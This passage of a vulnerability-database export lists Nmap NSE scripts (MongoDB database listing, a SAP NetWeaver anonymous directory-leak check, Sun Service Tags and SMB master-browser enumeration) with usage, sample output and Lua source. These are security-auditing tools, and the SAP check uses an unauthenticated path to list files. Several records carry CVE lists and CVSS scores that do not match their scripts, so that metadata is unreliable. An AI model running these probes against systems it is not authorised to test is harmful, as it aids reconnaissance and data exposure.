end\n\n local try = nmap.new_try(catch)\n\n try( socket:connect(host, port) )\n\n -- ugliness to allow creds.mongodb to work, as the port is not recognized\n -- as mongodb, unless a service scan was run\n local ps = port.service\n port.service = 'mongodb'\n local c = creds.Credentials:new(creds.ALL_DATA, host, port)\n for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do\n local status, err = mongodb.login(socket, \"admin\", cred.user, cred.pass)\n if ( not(status) ) then\n return err\n end\n end\n port.service = ps\n\n local req, result, packet, err, status\n --Build packet\n status, packet = mongodb.listDbQuery()\n if not status then return result end-- Error message\n\n --- Send packet\n status, result = mongodb.query(socket, packet)\n if not status then return result end-- Error message\n\n port.version.name ='mongodb'\n port.version.product='MongoDB'\n nmap.set_port_version(host,port)\n\n local output = mongodb.queryResultToTable(result)\n if err ~= nil then\n stdnse.log_error(err)\n end\n if result ~= nil then\n return stdnse.format_output(true, output )\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:58", "description": "Detects SAP Netweaver Portal instances that allow anonymous access to the KM unit navigation page. This page leaks file names, ldap users, etc. \n\nSAP Netweaver Portal with the Knowledge Management Unit enable allows unauthenticated users to list file system directories through the URL '/irj/go/km/navigation?Uri=/'. \n\nThis issue has been reported and won't be fixed. \n\nReferences: \n\n * <https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm>\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n\n * nmap -p 80 --script http-sap-netweaver-leak <target>\n\n * nmap -sV --script http-sap-netweaver-leak <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | http-sap-netweaver-leak:\n | VULNERABLE:\n | Anonymous access to SAP Netweaver Portal\n | State: VULNERABLE (Exploitable)\n | SAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information\n | including file system structure, LDAP users, emails and other information.\n |\n | Disclosure date: 2018-02-1\n | Check results:\n | Visit /irj/go/km/navigation?Uri=/ to access this SAP instance.\n | Extra information:\n | ~system\n | discussiongroups\n | documents\n | Entry Points\n | etc\n | Reporting\n | References:\n |_ https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [vulns](<../lib/vulns.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-19T05:00:46", "type": "nmap", "title": "http-sap-netweaver-leak NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-11-08T20:35:14", "id": "NMAP:HTTP-SAP-NETWEAVER-LEAK.NSE", "href": "https://nmap.org/nsedoc/scripts/http-sap-netweaver-leak.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal table = require \"table\"\n\ndescription = [[\nDetects SAP Netweaver Portal instances that allow anonymous access to the\n KM unit navigation page. This page leaks file names, ldap users, etc.\n\nSAP Netweaver Portal with the Knowledge Management Unit enable allows unauthenticated\nusers to list file system directories through the URL '/irj/go/km/navigation?Uri=/'.\n\nThis issue has been reported and won't be fixed.\n\nReferences:\n* https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm\n]]\n\n---\n-- @usage nmap -p 80 --script http-sap-netweaver-leak <target>\n-- @usage nmap -sV --script http-sap-netweaver-leak <target>\n--\n-- @output \n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | http-sap-netweaver-leak:\n-- | VULNERABLE:\n-- | Anonymous access to SAP Netweaver Portal\n-- | State: VULNERABLE (Exploitable)\n-- | SAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information\n-- | including file system structure, LDAP users, emails and other information.\n-- |\n-- | Disclosure date: 2018-02-1\n-- | Check results:\n-- | Visit /irj/go/km/navigation?Uri=/ to access this SAP instance.\n-- | Extra information:\n-- | ~system\n-- | discussiongroups\n-- | documents\n-- | Entry Points\n-- | etc\n-- | Reporting\n-- | References:\n-- |_ https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm\n--\n-- @xmloutput\n-- <table key=\"NMAP-1\">\n-- <elem key=\"title\">Anonymous access to SAP Netweaver Portal</elem>\n-- <elem key=\"state\">VULNERABLE (Exploitable)</elem>\n-- <table key=\"description\">\n-- <el em>SAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information
\n-- including file system structure, LDAP users, emails and other information.
</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"day\">1</elem>\n-- <elem key=\"year\">2018</elem>\n-- <elem key=\"month\">02</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2018-02-1</elem>\n-- <table key=\"check_results\">\n-- <elem>Visit /irj/go/km/navigation?Uri=/ to access this SAP instance.</elem>\n-- </table>\n-- <table key=\"extra_info\">\n-- <elem>&#x7e;system</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm</elem>\n-- </table>\n-- </table>\n-- </script>\n---\n\nauthor = \"Francisco Leon <@arphanetx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\nlocal evil_path = \"/irj/go/km/navigation?Uri=/\"\n\nportrule = shortport.http\n\naction = function(host, port)\n local vuln = {\n title = 'Anonymous access to SAP Netweaver Portal',\n state = vulns.STATE.NOT_VULN,\n description = [[\nSAP Netweaver Portal with the Knowledge Management Unit allows attackers to obtain system information\nincluding file system structure, LDAP users, emails and other information.\n ]],\n references = {\n 'https://help.sap.com/saphelp_nw73ehp1/helpdata/en/4a/5c004250995a6ae10000000a42189b/frameset.htm',\n },\n dates = {\n disclosure = {year = '2018', month = '02', day = '1'},\n },\n }\n\n local status_404, result_404, _= http.identify_404(host,port)\n if (status_404 and result_404 == 200 ) then\n stdnse.debug1(\"Exiting due to ambiguous response from web server on %s%:s.All URIs return status 200\", host.ip, port.number)\n return nil\n end\n\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n local output_table = stdnse.output_table()\n local options = {header={}, no_cache=true, bypass_cache=true}\n\n --We need a valid User Agent for SAP Netweaver Portal servers\n options['header']['User-Agent'] = \"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1;\"\n ..\".NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0\"\n\n local response = http.get(host, port, evil_path, options)\n if response and response.status == 200 then\n if string.find(response.body,'logon') then\n stdnse.debug1(\"String 'logon' was found in this page. Exiting.\")\n return vuln_report:make_output(vuln)\n else\n local files = {}\n for file in string.gmatch(response.body, \"[Cc][Ll][Aa][Ss][Ss][=][\\\"]urTxtStd[\\\"]>([^$<]*.)</[Ss][Pp][Aa][Nn]>\") do\n table.insert(files, file)\n end\n if #files>0 then\n vuln.state = vulns.STATE.EXPLOIT\n\tvuln.extra_info = files\n\tvuln.check_results = string.format(\"Visit %s to obtain more information about the files.\", evil_path)\n end\n return vuln_report:make_output(vuln)\n end\n else\n stdnse.debug1(\"SAP Netweaver Portal not found.\")\n return vuln_report:make_output(vuln)\n end\n \nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:02", "description": "Attempts to extract system information (OS, hardware, etc.) from the Sun Service Tags service agent (UDP port 6481). \n\nBased on protocol specs from <http://arc.opensolaris.org/caselog/PSARC/2006/638/stdiscover_protocolv2.pdf> <http://arc.opensolaris.org/caselog/PSARC/2006/638/stlisten_protocolv2.pdf> <http://arc.opensolaris.org/caselog/PSARC/2006/638/ServiceTag_API_CLI_v07.pdf>\n\n## Example Usage \n \n \n nmap -sU -p 6481 --script=servicetags <target>\n\n## Script Output \n \n \n | servicetags:\n | URN: urn:st:3bf76681-5e68-415b-f980-abcdef123456\n | System: SunOS\n | Release: 5.10\n | Hostname: myhost\n | Architecture: sparc\n | Platform: SUNW,SPARC-Enterprise-T5120::Generic_142900-13\n | Manufacturer: Sun Microsystems, Inc.\n | CPU Manufacturer: Sun Microsystems, Inc.\n | Serial Number: ABC123456\n | HostID: 12345678\n | RAM: 16256\n | CPUs: 1\n | Cores: 4\n | Virtual CPUs: 32\n | CPU Name: UltraSPARC-T2\n | CPU Clock Rate: 1165\n | Service Tags\n | Solaris 10 Operating System\n | Product Name: Solaris 10 Operating System\n | Instance URN: urn:st:90592a79-974d-ebcc-c17a-b87b8eee5f1f\n | Product Version: 10\n | Product URN: urn:uuid:5005588c-36f3-11d6-9cec-fc96f718e113\n | Product Parent URN: urn:uuid:596ffcfa-63d5-11d7-9886-ac816a682f92\n | Product Parent: Solaris Operating System\n | Product Defined Instance ID:\n | Timestamp: 2010-08-10 07:35:40 GMT\n | Container: global\n | Source: SUNWstosreg\n | SUNW,SPARC-Enterprise-T5120 SPARC System\n | Product Name: SUNW,SPARC-Enterprise-T5120 SPARC System\n | Instance URN: urn:st:51c61acd-9f37-65af-a667-c9925a5b0ee9\n | Product Version:\n | Product URN: urn:st:hwreg:SUNW,SPARC-Enterprise-T5120:Sun Microsystems:sparc\n | Product Parent URN: urn:st:hwreg:System:Sun Microsystems\n | Product Parent: System\n | Product Defined Instance ID:\n | Timestamp: 2010-08-10 07:35:41 GMT\n | Container: global\n | Source: SUNWsthwreg\n | Explorer\n | Product Name: Explorer\n | Instance URN: urn:st:2dc5ab61-9bb5-409b-e910-fa39840d0d85\n | Product Version: 6.4\n | Product URN: urn:uuid:9cb70a38-7d15-11de-9d26-080020a9ed93\n | Product Parent URN:\n | Product Parent:\n | Product Defined Instance ID:\n | Timestamp: 2010-08-10 07:35:42 GMT\n | Container: global\n |_ Source: Explorer\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [match](<../lib/match.html>)\n * [os](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-02-22T04:32:51", "type": "nmap", "title": "servicetags NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SERVICETAGS.NSE", "href": "https://nmap.org/nsedoc/scripts/servicetags.html", "sourceData": "local nmap = require \"nmap\"\nlocal match = require \"match\"\nlocal os = require \"os\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to extract system information (OS, hardware, etc.) from the Sun Service Tags service agent (UDP port 6481).\n\nBased on protocol specs from\nhttp://arc.opensolaris.org/caselog/PSARC/2006/638/stdiscover_protocolv2.pdf\nhttp://arc.opensolaris.org/caselog/PSARC/2006/638/stlisten_protocolv2.pdf\nhttp://arc.opensolaris.org/caselog/PSARC/2006/638/ServiceTag_API_CLI_v07.pdf\n]]\n\n---\n-- @usage\n-- nmap -sU -p 6481 --script=servicetags <target>\n-- @output\n-- | servicetags:\n-- | URN: urn:st:3bf76681-5e68-415b-f980-abcdef123456\n-- | System: SunOS\n-- | Release: 5.10\n-- | Hostname: myhost\n-- | Architecture: sparc\n-- | Platform: SUNW,SPARC-Enterprise-T5120::Generic_142900-13\n-- | Manufacturer: Sun Microsystems, Inc.\n-- | CPU Manufacturer: Sun Microsystems, Inc.\n-- | Serial Number: ABC123456\n-- | HostID: 12345678\n-- | RAM: 16256\n-- | CPUs: 1\n-- | Cores: 4\n-- | Virtual CPUs: 32\n-- | CPU Name: UltraSPARC-T2\n-- | CPU Clock Rate: 1165\n-- | Service Tags\n-- | Solaris 10 Operating System\n-- | Product Name: Solaris 10 Operating System\n-- | Instance URN: urn:st:90592a79-974d-ebcc-c17a-b87b8eee5f1f\n-- | Product Version: 10\n-- | Product URN: urn:uuid:5005588c-36f3-11d6-9cec-fc96f718e113\n-- | Product Parent URN: urn:uuid:596ffcfa-63d5-11d7-9886-ac816a682f92\n-- | Product Parent: Solaris Operating System\n-- | Product Defined Instance ID:\n-- | Timestamp: 2010-08-10 07:35:40 GMT\n-- | Container: global\n-- | Source: SUNWstosreg\n-- | SUNW,SPARC-Enterprise-T5120 SPARC System\n-- | Product Name: SUNW,SPARC-Enterprise-T5120 SPARC System\n-- | Instance URN: urn:st:51c61acd-9f37-65af-a667-c9925a5b0ee9\n-- | Product Version:\n-- | Product URN: urn:st:hwreg:SUNW,SPARC-Enterprise-T5120:Sun Microsystems:sparc\n-- | Product Parent URN: urn:st:hwreg:System:Sun Microsystems\n-- | Product Parent: System\n-- | Product Defined Instance ID:\n-- | Timestamp: 2010-08-10 07:35:41 GMT\n-- | Container: global\n-- | Source: SUNWsthwreg\n-- | Explorer\n-- | Product Name: Explorer\n-- | Instance URN: urn:st:2dc5ab61-9bb5-409b-e910-fa39840d0d85\n-- | Product Version: 6.4\n-- | Product URN: urn:uuid:9cb70a38-7d15-11de-9d26-080020a9ed93\n-- | Product Parent URN:\n-- | Product Parent:\n-- | Product Defined Instance ID:\n-- | Timestamp: 2010-08-10 07:35:42 GMT\n-- | Container: global\n-- |_ Source: Explorer\n\n\n-- version 1.0\n\nauthor = \"Matthew Flanagan\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\n-- Mapping from XML element names to human-readable table labels.\nlocal XML_TO_TEXT = {\n -- Information about the agent.\n system = \"System\",\n release = \"Release\",\n host = \"Hostname\",\n architecture = \"Architecture\",\n platform = \"Platform\",\n manufacturer = \"Manufacturer\",\n cpu_manufacturer = \"CPU Manufacturer\",\n serial_number = \"Serial Number\",\n hostid = \"HostID\",\n physmem = \"RAM\",\n sockets = \"CPUs\",\n cores = \"Cores\",\n virtcpus = \"Virtual CPUs\",\n name = \"CPU Name:\",\n clockrate = \"CPU Clock Rate\",\n\n -- Information about an individual svctag.\n product_name = \"Product Name\",\n instance_urn = \"Instance URN\",\n product_version = \"Product Version\",\n product_urn = \"Product URN\",\n product_parent_urn = \"Product Parent URN\",\n product_parent = \"Product Parent\",\n product_defined_inst_id = \"Product Defined Instance ID\",\n product_vendor = \"Product Vendor\",\n timestamp = \"Timestamp\",\n container = \"Container\",\n source = \"Source\",\n platform_arch = \"Platform Arch\",\n installer_uid = \"Installer UID\",\n version = \"Version\",\n}\n\n---\n-- Runs on UDP port 6481\nportrule = shortport.portnumber(6481, \"udp\", {\"open\", \"open|filtered\"})\n\nlocal get_agent, get_svctag_list, get_svctag\n\n---\n-- Sends Service Tags discovery packet to host,\n-- and extracts service information from results\naction = function(host, port)\n\n -- create the socket used for our connection\n local socket = nmap.new_socket()\n\n -- set a reasonable timeout value\n socket:set_timeout(5000)\n\n -- do some exception handling / cleanup\n local catch = function()\n socket:close()\n end\n\n local try = nmap.new_try(catch)\n\n -- connect to the potential service tags discoverer\n try(socket:connect(host, port))\n\n local payload\n\n payload = \"[PROBE] \".. tostring(os.time()) .. \"\\r\\n\"\n\n try(socket:send(payload))\n\n local status\n local response\n\n -- read in any response we might get\n response = try(socket:receive())\n socket:close()\n\n -- since we got something back, the port is definitely open\n nmap.set_port_state(host, port, \"open\")\n\n -- buffer to hold script output\n local output = {}\n\n -- We should get a response back that has contains one line for the\n -- agent URN and TCP port\n local urn, xport, split\n split = stringaux.strsplit(\" \", response)\n urn = split[1]\n xport = split[2]\n table.insert(output, \"URN: \" .. urn)\n\n if xport ~= nil then\n get_agent(host, xport, output)\n\n -- Check if any other service tags are registered and enumerate them\n local svctags_list\n status, svctags_list = get_svctag_list(host, xport, output)\n if status then\n local svctags = {}\n local tag\n for _, svctag in ipairs(svctags_list) do\n svctags['name'] = \"Service Tags\"\n status, tag = get_svctag(host, port, svctag)\n if status then\n svctags[#svctags + 1] = tag\n end\n end\n table.insert(output, svctags)\n end\n end\n\n port.name = \"servicetags\"\n nmap.set_port_version(host, port)\n\n return stdnse.format_output(true, output)\nend\n\nfunction get_agent(host, port, output)\n local socket = nmap.new_socket()\n local status, err, response\n socket:set_timeout(5000)\n\n status, err = socket:connect(host.ip, port, \"tcp\")\n if not status then\n return nil, err\n end\n status, err = socket:send(\"GET /stv1/agent/ HTTP/1.0\\r\\n\")\n if not status then\n socket:close()\n return nil, err\n end\n status, response = socket:receive_buf(match.pattern_limit(\"</st1:response>\", 2048), true)\n if not status then\n socket:close()\n return nil, response\n end\n\n socket:close()\n\n for elem, contents in string.gmatch(response, \"<([^>]+)>([^<]-)</%1>\") do\n if XML_TO_TEXT[elem] then\n table.insert(output,\n string.format(\"%s: %s\", XML_TO_TEXT[elem], contents))\n end\n end\n\n return true, output\nend\n\nfunction get_svctag_list(host, port)\n local socket = nmap.new_socket()\n local status, err, response\n socket:set_timeout(5000)\n\n status, err = socket:connect(host.ip, port, \"tcp\")\n if not status then\n return nil, err\n end\n status, err = socket:send(\"GET /stv1/svctag/ HTTP/1.0\\r\\n\")\n if not status then\n socket:close()\n return nil, err\n end\n status, response = socket:receive_buf(match.pattern_limit(\"</service_tags>\", 2048), true)\n if not status then\n socket:close()\n return nil, response\n end\n\n socket:close()\n\n local svctags = {}\n for svctag in string.gmatch(response, \"<link type=\\\"service_tag\\\" href=\\\"(.-)\\\" />\") do\n svctags[#svctags + 1] = svctag\n end\n\n return true, svctags\nend\n\nfunction get_svctag(host, port, svctag)\n local socket = nmap.new_socket()\n local status, err, response\n socket:set_timeout(5000)\n\n status, err = socket:connect(host.ip, port, \"tcp\")\n if not status then\n return nil, err\n end\n status, err = socket:send(\"GET \" .. svctag .. \" HTTP/1.0\\r\\n\")\n if not status then\n socket:close()\n return nil, err\n end\n status, response = socket:receive_buf(match.pattern_limit(\"</st1:response>\", 2048), true)\n if not status then\n socket:close()\n return nil, response\n end\n\n socket:close()\n\n local tag = {}\n for elem, contents in string.gmatch(response, \"<([^>]+)>([^<]-)</%1>\") do\n if elem == \"product_name\" then\n tag['name'] = contents\n end\n if XML_TO_TEXT[elem] then\n table.insert(tag,\n string.format(\"%s: %s\", XML_TO_TEXT[elem], contents))\n end\n end\n\n return true, tag\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:25", "description": "Queries information managed by the Windows Master Browser.\n\n## Script Arguments \n\n#### smb-mbenum.format \n\n(optional) if set, changes the format of the result returned by the script. There are three possible formats: 1\\. Ordered by type horizontally 2\\. Ordered by type vertically 3\\. Ordered by type vertically with details (default)\n\n#### smb-mbenum.domain \n\n(optional) if not specified, lists the domain of the queried browser\n\n#### smb-mbenum.filter \n\n(optional) if set, queries the browser for a specific type of server (@see ServerTypes)\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 445 <host> --script smb-mbenum\n \n\n## Script Output \n \n \n | smb-mbenum:\n | Backup Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | DFS Root\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Master Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | SQL Server\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server service\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Windows NT/2000/XP/2003 server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Workstation\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n \n\n## Requires \n\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-19T18:47:19", "type": "nmap", "title": "smb-mbenum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SMB-MBENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-mbenum.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription=[[\nQueries information managed by the Windows Master Browser.\n]]\n\n---\n-- @usage\n-- nmap -p 445 <host> --script smb-mbenum\n--\n-- @output\n-- | smb-mbenum:\n-- | Backup Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | DFS Root\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Master Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | SQL Server\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Server service\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Windows NT/2000/XP/2003 server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Workstation\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n--\n-- @args smb-mbenum.format (optional) if set, changes the format of the result\n-- returned by the script. There are three possible formats:\n-- 1. Ordered by type horizontally\n-- 2. Ordered by type vertically\n-- 3. Ordered by type vertically with details (default)\n--\n-- @args smb-mbenum.filter (optional) if set, queries the browser for a\n-- specific type of server (@see ServerTypes)\n--\n-- @args smb-mbenum.domain (optional) if not specified, lists the domain of the queried browser\n--\n\n--\n-- Version 0.1\n-- Created 06/11/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nhostrule = function(host) return smb.get_port(host) ~= nil end\n\nlocal function log(msg) stdnse.debug3(\"%s\", msg) end\n\nServerTypes = {\n SV_TYPE_WORKSTATION = 0x00000001,\n SV_TYPE_SERVER = 0x00000002,\n SV_TYPE_SQLSERVER = 0x00000004,\n SV_TYPE_DOMAIN_CTRL = 0x00000008,\n SV_TYPE_DOMAIN_BAKCTRL = 0x00000010,\n SV_TYPE_TIME_SOURCE = 0x00000020,\n SV_TYPE_AFP = 0x00000040,\n SV_TYPE_NOVELL = 0x00000080,\n SV_TYPE_DOMAIN_MEMBER = 0x00000100,\n SV_TYPE_PRINTQ_SERVER = 0x00000200,\n SV_TYPE_DIALIN_SERVER = 0x00000400,\n SV_TYPE_SERVER_UNIX = 0x00000800,\n SV_TYPE_NT = 0x00001000,\n SV_TYPE_WFW = 0x00002000,\n SV_TYPE_SERVER_MFPN = 0x00004000,\n SV_TYPE_SERVER_NT = 0x00008000,\n SV_TYPE_POTENTIAL_BROWSER = 0x00010000,\n SV_TYPE_BACKUP_BROWSER = 0x00020000,\n SV_TYPE_MASTER_BROWSER = 0x00040000,\n SV_TYPE_DOMAIN_MASTER = 0x00080000,\n SV_TYPE_WINDOWS = 0x00400000,\n SV_TYPE_DFS = 0x00800000,\n SV_TYPE_CLUSTER_NT = 0x01000000,\n SV_TYPE_TERMINALSERVER = 0x02000000,\n SV_TYPE_CLUSTER_VS_NT = 0x04000000,\n SV_TYPE_DCE = 0x10000000,\n SV_TYPE_ALTERNATE_XPORT = 0x20000000,\n SV_TYPE_LOCAL_LIST_ONLY = 0x40000000,\n SV_TYPE_DOMAIN_ENUM = 0x80000000,\n SV_TYPE_ALL = 0xFFFFFFFF\n}\n\nTypeNames = {\n SV_TYPE_WORKSTATION = { long = \"Workstation\", short = \"WKS\" },\n SV_TYPE_SERVER = { long = \"Server service\", short = \"SRVSVC\" },\n SV_TYPE_SQLSERVER = { long = \"SQL Server\", short = \"MSSQL\" },\n SV_TYPE_DOMAIN_CTRL = { long = \"Domain Controller\", short = \"DC\" },\n SV_TYPE_DOMAIN_BAKCTRL = { long = \"Backup Domain Controller\", short = \"BDC\" },\n SV_TYPE_TIME_SOURCE = { long = \"Time Source\", short = \"TIME\" },\n SV_TYPE_AFP = { long = \"Apple File Protocol Server\", short = \"AFP\" },\n SV_TYPE_NOVELL = { long = \"Novell Server\", short = \"NOVELL\" },\n SV_TYPE_DOMAIN_MEMBER = { long = \"LAN Manager Domain Member\", short = \"MEMB\" },\n SV_TYPE_PRINTQ_SERVER = { long = \"Print server\", short = \"PRINT\" },\n SV_TYPE_DIALIN_SERVER = { long = \"Dial-in server\", short = \"DIALIN\" },\n SV_TYPE_SERVER_UNIX = { long = \"Unix server\", short = \"UNIX\" },\n 